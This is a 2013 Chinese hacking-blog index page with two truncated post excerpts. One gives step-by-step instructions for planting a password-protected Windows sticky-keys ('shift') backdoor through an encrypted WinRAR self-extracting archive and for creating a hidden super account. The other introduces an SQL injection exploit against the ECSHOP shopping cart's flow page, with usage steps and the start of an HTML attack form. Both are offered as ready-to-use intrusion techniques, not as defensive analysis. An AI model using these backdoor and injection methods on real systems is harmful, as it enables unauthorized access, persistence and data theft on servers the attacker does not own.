shift后门制作和超级帐户的建立

分类:安全 | 2013-05-31 | 撸过 969 次
3人扯谈

        前段时间去一个流量过百万的站的服务器上参观,朋友加了一个shift后门并称该后门是很久以前他公布的,具体情况我也没多问,回来后自己也做了一个加密码的shift后门.利用winrar加密的.很简单,火力群里一个小弟弟问我怎么做的,叫我写个说明,那么我就简单介绍一下制作过程-Amxking
  1.我们首先建立一个名为win.rar的压缩包,及一个批处理命令名为AK.bat的文件.
  2.再把这个批处理文件AK.bat加到win.rar压缩包内加密.在高级选项里设置密码如:!@#$%^&
  3.将win.rar做成自解压格式:
  添加新的自解压→Default.SFX 图形界[......]

继续阅读

ECSHOP的flow页注入利用方法&EXP

分类:安全 | 2013-05-21 | 撸过 1,040 次
3人扯谈

利用办法:先注册.把任意商品加入购物车在填写配送地址那一页,有地区选择,随便选个地区,复制地址到exp下。
EXP:

<form name="form1" method="post">
ECSHOP通版本注入漏洞 简单EXP [ Silic Group Hacker Army ]<input name="country" type="text" style="display:none" value="1"/><br />
<textarea rows="5" style="font-family:Times New Roman;font-size:1[......]

继续阅读